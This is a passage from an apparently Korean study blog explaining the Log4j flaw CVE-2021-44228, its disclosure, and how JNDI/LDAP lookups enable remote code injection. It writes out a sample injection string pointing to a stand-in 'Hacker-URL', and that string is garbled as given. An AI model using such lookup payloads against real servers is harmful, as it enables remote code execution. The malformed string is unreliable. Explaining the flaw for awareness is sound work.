공부하는 개발자 핑구 🐧 공부하는 개발자 핑구 🐧

제로데이 어택으로 분류되는 log4j CVE-2021-44228 이 2021년 11월 24일에 알리바바 클라우드 보안팀 소속 Chen Zhaojun 의해 보고 되었다. (약 8년동안 방치되었다고 한다) 아파치의 Log4j 로 인해 Remote Code Injection (과거 SQL Injection 과 같이) 이 가능하다는 사실이 알려졌다. 애플, 테슬라, 아마존등에서 이미 이러한 취약점이 발견되었고, 보고 후 많은 테스트들이 시연되었다.. [얼마나 간단하기에?] Log4j 의 JNDI와 LDAP 때문에 생긴 틈인데, 로그가 기록되는 곳(로그인과 사용자입력)을 찾아 ${jndi:sndi:snd://Hacker-URL} 와 같은 값을 추가하면 Hacker-URL 에 호스팅 되어있는 코드가 공격받는 서버에..